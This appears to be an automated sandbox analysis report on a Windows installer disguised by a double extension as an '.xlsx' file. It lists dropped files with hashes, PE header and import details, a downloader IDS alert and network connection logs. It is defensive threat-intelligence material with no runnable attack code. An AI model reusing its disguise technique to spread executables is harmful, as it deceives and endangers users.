                                                                          • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                                          • Filename: debit-note-19-08-dn-2024.exe, Detection: malicious, Browse
                                                                          • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                                          • Filename: HE9306_AWBLaser_Single240812144358.exe, Detection: malicious, Browse
                                                                          • Filename: z41_EX24-772_24.exe, Detection: malicious, Browse
                                                                          Reputation:moderate, very likely benign file
                                                                          Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1...u.u.u...s.u.a....r.!..q....t....t.Richu.........................PE..L....n3T...........!..... ...........'.......0...............................`.......................................2.......0..P............................P.......................................................0..X............................text............ .................. ..`.rdata..S....0.......$..............@..@.data...x....@.......(..............@....reloc..b....P.......*..............@..B................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):1199146
                                                                          Entropy (8bit):3.3464346722807505
                                                                          Encrypted:false
                                                                          SSDEEP:6144:AP75ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Js9g5PNp0AJ2aJ4aKh:AP75ehxkWL8zz9Eo+2eIYBkWz5P4Ph
                                                                          MD5:88C3E9ED0EF59E29A94711546BC32ABC
                                                                          SHA1:30235C24491AF4AFA40967FB2E97E8C47A3A7C54
                                                                          SHA-256:41C07FDBD9838B799D5EF07E1C85045CBE0910B322D93D5C5298D558F61426BB
                                                                          SHA-512:1B2F1EA7976F98421061CF119BA047BAFF85567C3AECAC56E54F32A41A04A9355281BF3526B3A5A5852A26D8CD089DFBE39752B3D6B40E1DDAD6211D266D16B3
                                                                          Malicious:false
                                                                          Reputation:low
                                                                          Preview:........,...................\...............................................................................................................................................................................................................................................................G...J...............j...........................................................................................................................................3...........................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:ASCII text, with CRLF line terminators
                                                                          Category:dropped
                                                                          Size (bytes):28
                                                                          Entropy (8bit):4.110577243331642
                                                                          Encrypted:false
                                                                          SSDEEP:3:iGAeTUHvn:lAeTUHv
                                                                          MD5:F6A80CF0B011E1638B38D8EAA2A9629B
                                                                          SHA1:30AB7FEEC5D0A304ED9908ADD562601E3E7118C3
                                                                          SHA-256:AB3B162F39F8FDBD8DD767791EC116E75DA198FCE6BABBA6E1677044678714D8
                                                                          SHA-512:E1EC33696EA5086DEA0A52B577442B96124B71CD09999637185D114B7E5F313D455560C350F5A02FBA83C5A3A12A5234EEC995D0AF0CBF64471B3887E2AA2ED8
                                                                          Malicious:false
                                                                          Preview:[Access]..Setting=Disabled..
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):28191
                                                                          Entropy (8bit):4.5554172315993275
                                                                          Encrypted:false
                                                                          SSDEEP:384:lU5Foko0Wy6buRWcJT8QEai+6m7AiWjSHk8Rco00LIkqRPonGlo:lU5ekoHyzxT8KT7PiKkK0hrKJ
                                                                          MD5:A8F95082B71E9CCC0A1B9D3285AB9125
                                                                          SHA1:B475ED39780310238995E4C1F3F7CEC555D8AC98
                                                                          SHA-256:0D0EBEBAF3EAA4D416399434511974EA882425CEBB01EC794C514CD329523C54
                                                                          SHA-512:10C7E33F12C8A6ECB6088B016651A9FADC1BF6108E15F00584E59DEDBD93CF602BAD52487EF31035BFA858D3A762CEC0BC5B88FF8F01AFC4BDA9189DC40DF0EC
                                                                          Malicious:false
                                                                          Preview:...T..i.........BB........;..._.;........ss..........................-.........p.fff..[......L..A.X...P.......ss...___.....D.#.....XX..^^^.....ddd.......... ..................n...........gggg.tttt....................FF.. .............kkk.........tt..................44..a............5..WWW...................:........nn........."..###......."""".......i..........................00..............2...uu........n..............Q.......V.........XXX........33......CCC.....................$..........4..............................qq..,.........T....\\\......EE......................................mm.............R..**.>>>.h.=.........m.........j..=.||..............................+++.o.....................zzzzz.s.....!..................aa........../...TTT......L.........%.....................cccccc.9999.........X.@@@..J.....i.......N......!!....................G...........r.....................$...+.....u.7.I....""...{{...............................VVV....................HH.............b......
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):207998
                                                                          Entropy (8bit):1.2479248406208852
                                                                          Encrypted:false
                                                                          SSDEEP:768:tCENokMNjB1phztRILF3znwMWQZeRdtDL7xIC8GI82e/2awZ6aXmpeNhLvkoVtOX:e03p6cf0/e9ReE8H
                                                                          MD5:5C283F56F45AD89C5D82538EA09AC0F5
                                                                          SHA1:FA3736CF43F5841B9D4E28FF2024C17897EEF745
                                                                          SHA-256:D53EE062B5FA4EB7DED4A658B37B70DD6E90A581AF5BDE713169971AE249F605
                                                                          SHA-512:2B2516707050C5DFB7A8D9E151DEE98EDD44B59B08E0F19D301F80BFDE89129F47EC6079AC1E26F6D8C60AAFE2931A4D2BC720BEDD8149477810B0C8F558AD0A
                                                                          Malicious:false
                                                                          Preview:..(.................>............................................................................................................8....dq......................`..-..............................................g..........s...............................................................................................................................b...RE.b.........................................................................w..........................................................................................%............................P..........]...............:.........B..........................................4.......................................................................n...............................................................o................4..................y...9........#......................m.....z...........................................................K.....D..............m...........................>...................?.....................k.....
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):443489
                                                                          Entropy (8bit):1.2463028275519636
                                                                          Encrypted:false
                                                                          SSDEEP:768:0B5HMEmj1BG+VGKVbkxUNjTj4Yl+ieTSrPb/1aKigAurLC2DVyTaL7B8IHBxCoxa:0kFoC4xKmYKV1tmGJJt0a+sWH0
                                                                          MD5:913964ACDFFFA24344A401D48E08C653
                                                                          SHA1:EE1E0AC79DA12D6439F9DF5B865347647473642A
                                                                          SHA-256:B3A4E2499F6A793497BAB8F5B6CC38462FD70F955308596ACFFF03D11F2F6ED4
                                                                          SHA-512:2AEBEB7DFFACF4150CCF6ED91EF5501B129331E5A2A4A465FC542562C52907FDA3990F7BE5F17B60854DE7FD34E6E2E873ED8C0DE6788964894890F69A9F261C
                                                                          Malicious:false
                                                                          Preview:..9............................................................2...................A.....................................................7...........................................................................g.......m..........................v.z.........9.........................K....................................................................................%...................:....................................................h...(... ..........]......]...........................-......................................................f......2.................d..........C...........................9.........._.....................L.......................................v..........................J...................\....................|........................&......'....N.....................................o............................8.....................................................................................................n...................................
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):209062
                                                                          Entropy (8bit):1.2469617066336303
                                                                          Encrypted:false
                                                                          SSDEEP:768:aq+yDnL4aSptsfjJcMBkQnTum3yc5rUGLJTLAP6zp2R5O73XKymSRQoWgqVB7L+v:T7c811jBM9Y1qeu30oHw
                                                                          MD5:607886D87859E45164D2959809AB5367
                                                                          SHA1:4E86EB72512D4C9BE32304E3A12B499D6A86084B
                                                                          SHA-256:A05695DF251298ED2F35E2DFA2C4CF44D5BACCC391615FACD34FA6411BB43217
                                                                          SHA-512:A767C56234A265E17FE3D05A1218D628419E3B750E7D55DD5E2D57A847DBF7B72E10270A1D9D14D39D62BCEF38818DE54168AF87C2DE59FDBF503F0C382DA5DE
                                                                          Malicious:false
                                                                          Preview:...............................................i........A........5............................b.t....!......................J.........................&................../Z.........................................................|........................T......^.................8...................D...............:..q......g.......................................................{........................p.................................................|..............B......`..............................0...............................o.......................N.......................f........................p............^.............................................................................+..A......................k........@...........................()......g..................U...................d.......................f...............].LF...................................................................}.._............................8......................................7..
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:data
                                                                          Category:dropped
                                                                          Size (bytes):290478
                                                                          Entropy (8bit):7.563899642939822
                                                                          Encrypted:false
                                                                          SSDEEP:6144:1ehxbAWL8zT55SgB9EZ+K1I3KDJ5QYu0Eqk90Jb:1ehxkWL8zz9Eo+2eIYBkWJ
                                                                          MD5:7C5950C0904C276B5EEA38CE56D01613
                                                                          SHA1:2B55A0A107564148DAFD55B58CE9842962DD273C
                                                                          SHA-256:2DF9631D6B7FFE6FF7DF858DB2953F7EA75AB9F37796B9531E4DFE587BA54FBA
                                                                          SHA-512:C82B984900CF00F055D0ACAAA6902189455F9DA4838DF0A9B82AF4E137F87AF68E941953D2039257F322F12FC0980B0B1D011A5F14619CF62FBB0F205D8D5C39
                                                                          Malicious:false
                                                                          Preview:.......uu....................iiii.....C...........2.............hhh....4..z...>>..(.........}}}}..........................EEE........W...............................................||...RRR...3.........@.........|.]...........................................r..888.............nnnnnn.....*.........PPP........................#..*.~..............--....%%%%%%.../.......................ttt.......................,.................. ....d............................XX.W......WWWW..............QQ................v...............................#.....!!!............^^^................:::...L...{...bb...........j.a....7..............aaa..............................................tt..........u.RR.x..ZZ.NNN..n...........''''....X....LLL..a....ffff..........~~..T.............1...........KK................................KKKK..=..........]..l......../......QQ......UUUU........2....NNN.[[...........FF....M...$../.`..................)....@.......JJJJ.....e......<...................!...............b..
                                                                          Process:C:\Users\user\Desktop\09-FD-94.03.60.175.07.xlsx.exe
                                                                          File Type:MS Windows shortcut, Item id list present, Has Relative path, Has Working directory, ctime=Sun Dec 31 23:25:52 1600, mtime=Sun Dec 31 23:25:52 1600, atime=Sun Dec 31 23:25:52 1600, length=0, window=hide
                                                                          Category:dropped
                                                                          Size (bytes):922
                                                                          Entropy (8bit):3.5131109546340507
                                                                          Encrypted:false
                                                                          SSDEEP:12:8wl0c0a/ledp8wXuQUlbq/JMRPbdpYmHbqjMRv8RMJsW+slmYXcuzJCN85v4t2YE:8QudO/9Q6jd9a6vDy3OcA24qy
                                                                          MD5:835EF96D9F21E737A29B55B119B32E7C
                                                                          SHA1:A4211042340681F64D4A6316F6857CCCF14DE65F
                                                                          SHA-256:A7225289785608B5C27B8B01851AB63EE02AF91A8D9AC25814BFD63D4C36A3A0
                                                                          SHA-512:07860938F330FC908BE6314286BCDE76D48EBBEA3FE118824F8D51A2CA2D76A888751AFAC709AFD368DB0F1331350CC91B91148037D3DABB3BF2D86E109DF17A
                                                                          Malicious:false
                                                                          Preview:L..................F........................................................q....P.O. .:i.....+00.../C:\...................z.1...........Program Files (x86).X............................................P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.)...".f.1...........Common Files..J............................................C.o.m.m.o.n. .F.i.l.e.s.....b.2...........cutline.sil.H............................................c.u.t.l.i.n.e...s.i.l.......2.....\.....\.P.r.o.g.r.a.m. .F.i.l.e.s. .(.x.8.6.).\.C.o.m.m.o.n. .F.i.l.e.s.\.c.u.t.l.i.n.e...s.i.l.U.C.:.\.U.s.e.r.s.\.e.n.g.i.n.e.e.r.\.A.p.p.D.a.t.a.\.R.o.a.m.i.n.g.\.M.i.c.r.o.s.o.f.t.\.W.i.n.d.o.w.s.\.T.e.m.p.l.a.t.e.s.\.t.y.p.h.l.o.s.t.o.m.y.\.C.a.r.f.u.f.f.l.i.n.g.........,...............$M....>M...EQ ..................1SPS.XF.L8C....&.m.q............/...S.-.1.-.5.-.2.1.-.2.2.4.6.1.2.2.6.5.8.-.3.6.9.3.4.0.5.1.1.7.-.2.4.7.6.7.5.6.6.3.4.-.1.0.0.3.................
                                                                          File type:PE32 executable (GUI) Intel 80386, for MS Windows, Nullsoft Installer self-extracting archive
                                                                          Entropy (8bit):7.884499331746193
                                                                          TrID:
                                                                          • Win32 Executable (generic) a (10002005/4) 99.96%
                                                                          • Generic Win/DOS Executable (2004/3) 0.02%
                                                                          • DOS Executable Generic (2002/1) 0.02%
                                                                          • Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
                                                                          File name:09-FD-94.03.60.175.07.xlsx.exe
                                                                          File size:530'598 bytes
                                                                          MD5:321a9608e5bf03bf63f4574d0df1a380
                                                                          SHA1:71c523fc14b83e0c8d5eac9bcc61c9487c1f2dfd
                                                                          SHA256:c113d227b647a1a61b1f9f6c5350a25a43acc26960ef9d9b1a3c5e80e68d75f0
                                                                          SHA512:ea16ef04d171e09971b49a8ee2cb1a4082ae794db9e6e53b2e702815cd275c48a390866de53845acf817a167ec14b4bf4c8c79cb8f590c8759f0cc1577a3e7ae
                                                                          SSDEEP:12288:XRV78hkvtMm2pbzH3lzmBI9jD9Bu3faTXXes:I+vthovMO9jhBsiTXX7
                                                                          TLSH:EEB423063AD1D81AD15D9A364FB3C2BDC376EC745C188E077F303E5B6C32A914A7A296
                                                                          File Content Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.......1.D9u.*ju.*ju.*j..ujw.*ju.+j..*j..wjd.*j!..j..*j..,jt.*jRichu.*j........PE..L....n3T.................`...*......Z3.......p....@
                                                                          Icon Hash:0714262e34390f06
                                                                          Entrypoint:0x40335a
                                                                          Entrypoint Section:.text
                                                                          Digitally signed:false
                                                                          Imagebase:0x400000
                                                                          Subsystem:windows gui
                                                                          Image File Characteristics:RELOCS_STRIPPED, EXECUTABLE_IMAGE, LINE_NUMS_STRIPPED, LOCAL_SYMS_STRIPPED, 32BIT_MACHINE
                                                                          DLL Characteristics:DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                                                                          Time Stamp:0x54336EB4 [Tue Oct 7 04:40:20 2014 UTC]
                                                                          TLS Callbacks:
                                                                          CLR (.Net) Version:
                                                                          OS Version Major:4
                                                                          OS Version Minor:0
                                                                          File Version Major:4
                                                                          File Version Minor:0
                                                                          Subsystem Version Major:4
                                                                          Subsystem Version Minor:0
                                                                          Import Hash:e221f4f7d36469d53810a4b5f9fc8966
                                                                          Instruction
                                                                          sub esp, 000002D8h
                                                                          push ebx
                                                                          push ebp
                                                                          push esi
                                                                          push edi
                                                                          push 00000020h
                                                                          xor ebp, ebp
                                                                          pop esi
                                                                          mov dword ptr [esp+18h], ebp
                                                                          mov dword ptr [esp+10h], 00409230h
                                                                          mov dword ptr [esp+14h], ebp
                                                                          call dword ptr [00407034h]
                                                                          push 00008001h
                                                                          call dword ptr [004070BCh]
                                                                          push ebp
                                                                          call dword ptr [004072ACh]
                                                                          push 00000009h
                                                                          mov dword ptr [004292B8h], eax
                                                                          call 00007F7410922DCAh
                                                                          mov dword ptr [00429204h], eax
                                                                          push ebp
                                                                          lea eax, dword ptr [esp+38h]
                                                                          push 000002B4h
                                                                          push eax
                                                                          push ebp
                                                                          push 004206A8h
                                                                          call dword ptr [0040717Ch]
                                                                          push 0040937Ch
                                                                          push 00428200h
                                                                          call 00007F7410922A35h
                                                                          call dword ptr [00407134h]
                                                                          mov ebx, 00434000h
                                                                          push eax
                                                                          push ebx
                                                                          call 00007F7410922A23h
                                                                          push ebp
                                                                          call dword ptr [0040710Ch]
                                                                          push 00000022h
                                                                          mov dword ptr [00429200h], eax
                                                                          pop edi
                                                                          mov eax, ebx
                                                                          cmp word ptr [00434000h], di
                                                                          jne 00007F741091FEB9h
                                                                          mov esi, edi
                                                                          mov eax, 00434002h
                                                                          push esi
                                                                          push eax
                                                                          call 00007F7410922473h
                                                                          push eax
                                                                          call dword ptr [00407240h]
                                                                          mov ecx, eax
                                                                          mov dword ptr [esp+1Ch], ecx
                                                                          jmp 00007F741091FFABh
                                                                          push 00000020h
                                                                          pop edx
                                                                          cmp ax, dx
                                                                          jne 00007F741091FEB9h
                                                                          inc ecx
                                                                          inc ecx
                                                                          cmp word ptr [ecx], dx
                                                                          Programming Language:
                                                                          • [EXP] VC++ 6.0 SP5 build 8804
                                                                          NameVirtual AddressVirtual Size Is in Section
                                                                          IMAGE_DIRECTORY_ENTRY_EXPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IMPORT0x74940xb4.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_RESOURCE0x4a0000x132d8.rsrc
                                                                          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_IAT0x70000x2b8.rdata
                                                                          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
                                                                          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
                                                                          NameVirtual AddressVirtual SizeRaw SizeMD5Xored PEZLIB ComplexityFile TypeEntropyCharacteristics
                                                                          .text0x10000x5ec60x600060ec0c4d80dd6821cdaced6135eddfd5False0.6593424479166666data6.438901783265187IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
                                                                          .rdata0x70000x13540x14002222fe44ebbadbc32af32dfc9c88e48eFalse0.4306640625data5.037511188789184IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          .data0x90000x202f80x60099cdd6cde9adee6bf3b24ee817b4574bFalse0.4830729166666667data3.8340327961758165IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .ndata0x2a0000x200000x0d41d8cd98f00b204e9800998ecf8427eFalse0empty0.0IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
                                                                          .rsrc0x4a0000x132d80x134006a5bbc33287fc34c026c3652aab40ca4False0.7685800527597403data6.977243320980138IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
                                                                          NameRVASizeTypeLanguageCountryZLIB Complexity
                                                                          RT_ICON0x4a4480xb1b3PNG image data, 256 x 256, 8-bit/color RGBA, non-interlacedEnglishUnited States0.9923501351915763
                                                                          RT_ICON0x556000x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 9600EnglishUnited States0.4311203319502075
                                                                          RT_ICON0x57ba80x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 4224EnglishUnited States0.48053470919324576
                                                                          RT_ICON0x58c500xea8Device independent bitmap graphic, 48 x 96 x 8, image size 2304, 256 important colorsEnglishUnited States0.5330490405117271
                                                                          RT_ICON0x59af80x988Device independent bitmap graphic, 24 x 48 x 32, image size 2400EnglishUnited States0.5647540983606557
                                                                          RT_ICON0x5a4800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 1024, 256 important colorsEnglishUnited States0.6353790613718412
                                                                          RT_ICON0x5ad280x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 576, 256 important colorsEnglishUnited States0.5961981566820277
                                                                          RT_ICON0x5b3f00x668Device independent bitmap graphic, 48 x 96 x 4, image size 1152EnglishUnited States0.3176829268292683
                                                                          RT_ICON0x5ba580x568Device independent bitmap graphic, 16 x 32 x 8, image size 256, 256 important colorsEnglishUnited States0.42124277456647397
                                                                          RT_ICON0x5bfc00x468Device independent bitmap graphic, 16 x 32 x 32, image size 1088EnglishUnited States0.6453900709219859
                                                                          RT_ICON0x5c4280x2e8Device independent bitmap graphic, 32 x 64 x 4, image size 512EnglishUnited States0.4274193548387097
                                                                          RT_ICON0x5c7100x1e8Device independent bitmap graphic, 24 x 48 x 4, image size 288EnglishUnited States0.4651639344262295
                                                                          RT_ICON0x5c8f80x128Device independent bitmap graphic, 16 x 32 x 4, image size 128EnglishUnited States0.5067567567567568
                                                                          RT_DIALOG0x5ca200x100dataEnglishUnited States0.5234375
                                                                          RT_DIALOG0x5cb200x11cdataEnglishUnited States0.6056338028169014
                                                                          RT_DIALOG0x5cc400xc4dataEnglishUnited States0.5918367346938775
                                                                          RT_DIALOG0x5cd080x60dataEnglishUnited States0.7291666666666666
                                                                          RT_GROUP_ICON0x5cd680xbcdataEnglishUnited States0.601063829787234
                                                                          RT_VERSION0x5ce280x1a4dataEnglishUnited States0.5642857142857143
                                                                          RT_MANIFEST0x5cfd00x305XML 1.0 document, ASCII text, with very long lines (773), with no line terminatorsEnglishUnited States0.5614489003880984
                                                                          DLLImport
                                                                          KERNEL32.dllCompareFileTime, SearchPathW, SetFileTime, CloseHandle, GetShortPathNameW, MoveFileW, SetCurrentDirectoryW, GetFileAttributesW, GetLastError, GetFullPathNameW, CreateDirectoryW, Sleep, GetTickCount, CreateFileW, GetFileSize, GetModuleFileNameW, GetCurrentProcess, CopyFileW, ExitProcess, SetEnvironmentVariableW, GetWindowsDirectoryW, SetFileAttributesW, ExpandEnvironmentStringsW, SetErrorMode, LoadLibraryW, lstrlenW, lstrcpynW, GetDiskFreeSpaceW, GlobalUnlock, GlobalLock, CreateThread, CreateProcessW, RemoveDirectoryW, lstrcmpiA, GetTempFileNameW, lstrcpyA, lstrcpyW, lstrcatW, GetSystemDirectoryW, GetVersion, GetProcAddress, LoadLibraryA, GetModuleHandleA, GetModuleHandleW, lstrcmpiW, lstrcmpW, WaitForSingleObject, GlobalFree, GlobalAlloc, LoadLibraryExW, GetExitCodeProcess, FreeLibrary, WritePrivateProfileStringW, GetCommandLineW, GetTempPathW, GetPrivateProfileStringW, FindFirstFileW, FindNextFileW, DeleteFileW, SetFilePointer, ReadFile, FindClose, MulDiv, MultiByteToWideChar, WriteFile, lstrlenA, WideCharToMultiByte
                                                                          USER32.dllEndDialog, ScreenToClient, GetWindowRect, RegisterClassW, EnableMenuItem, GetSystemMenu, SetClassLongW, IsWindowEnabled, SetWindowPos, GetSysColor, GetWindowLongW, SetCursor, LoadCursorW, CheckDlgButton, GetMessagePos, LoadBitmapW, CallWindowProcW, IsWindowVisible, CloseClipboard, SetClipboardData, wsprintfW, CreateWindowExW, SystemParametersInfoW, AppendMenuW, CreatePopupMenu, GetSystemMetrics, SetDlgItemTextW, GetDlgItemTextW, MessageBoxIndirectW, CharPrevW, CharNextA, wsprintfA, DispatchMessageW, PeekMessageW, ReleaseDC, EnableWindow, InvalidateRect, SendMessageW, DefWindowProcW, BeginPaint, GetClientRect, FillRect, DrawTextW, GetClassInfoW, DialogBoxParamW, CharNextW, ExitWindowsEx, DestroyWindow, CreateDialogParamW, SetTimer, SetWindowTextW, PostQuitMessage, GetDC, SetWindowLongW, LoadImageW, SendMessageTimeoutW, FindWindowExW, EmptyClipboard, OpenClipboard, TrackPopupMenu, EndPaint, ShowWindow, GetDlgItem, IsWindow, SetForegroundWindow
                                                                          GDI32.dllSelectObject, SetBkMode, CreateFontIndirectW, SetTextColor, DeleteObject, GetDeviceCaps, CreateBrushIndirect, SetBkColor
                                                                          SHELL32.dllSHGetSpecialFolderLocation, SHGetPathFromIDListW, SHBrowseForFolderW, SHGetFileInfoW, ShellExecuteW, SHFileOperationW
                                                                          ADVAPI32.dllRegCloseKey, RegOpenKeyExW, RegDeleteKeyW, RegDeleteValueW, RegEnumValueW, RegCreateKeyExW, RegSetValueExW, RegQueryValueExW, RegEnumKeyW
                                                                          COMCTL32.dllImageList_Create, ImageList_AddMasked, ImageList_Destroy
                                                                          ole32.dllCoCreateInstance, CoTaskMemFree, OleInitialize, OleUninitialize
                                                                          VERSION.dllGetFileVersionInfoSizeW, GetFileVersionInfoW, VerQueryValueW
                                                                          Language of compilation systemCountry where language is spokenMap
                                                                          EnglishUnited States
                                                                          TimestampSIDSignatureSeveritySource IPSource PortDest IPDest PortProtocol
                                                                          2024-12-16T18:05:19.641089+01002803270ETPRO MALWARE Common Downloader Header Pattern UHCa2192.168.2.649756172.217.19.174443TCP
                                                                          TimestampSource PortDest PortSource IPDest IP
                                                                          Dec 16, 2024 18:05:16.921926975 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:16.921984911 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:16.922077894 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:16.936881065 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:16.936903954 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:18.746984959 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:18.747076035 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:18.747769117 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:18.747826099 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:18.802337885 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:18.802376986 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:18.803350925 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:18.803512096 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:18.808106899 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:18.855334997 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:19.641060114 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:19.641134977 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:19.641163111 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:19.641204119 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:19.641324997 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:19.641402960 CET44349756172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:19.641452074 CET49756443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:19.800636053 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:19.800683975 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:19.800738096 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:19.801204920 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:19.801219940 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:21.517611027 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:21.517735958 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:21.538772106 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:21.538795948 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:21.539777040 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:21.539860010 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:21.540265083 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:21.583386898 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.474832058 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.474903107 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.474921942 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.475050926 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.475393057 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.475451946 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.475476980 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.475518942 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.475616932 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:22.475733995 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.483896017 CET49764443192.168.2.6142.250.181.1
                                                                          Dec 16, 2024 18:05:22.483916044 CET44349764142.250.181.1192.168.2.6
                                                                          Dec 16, 2024 18:05:32.504925013 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:32.504972935 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:32.505033016 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:32.505456924 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:32.505475998 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:34.204242945 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:34.204339027 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:34.205327034 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:34.205449104 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:34.207003117 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:34.207010984 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:34.207360983 CET44349806172.217.19.174192.168.2.6
                                                                          Dec 16, 2024 18:05:34.207521915 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:34.207942963 CET49806443192.168.2.6172.217.19.174
                                                                          Dec 16, 2024 18:05:34.255333900 CET44349806172.217.19.174192.168.2.6
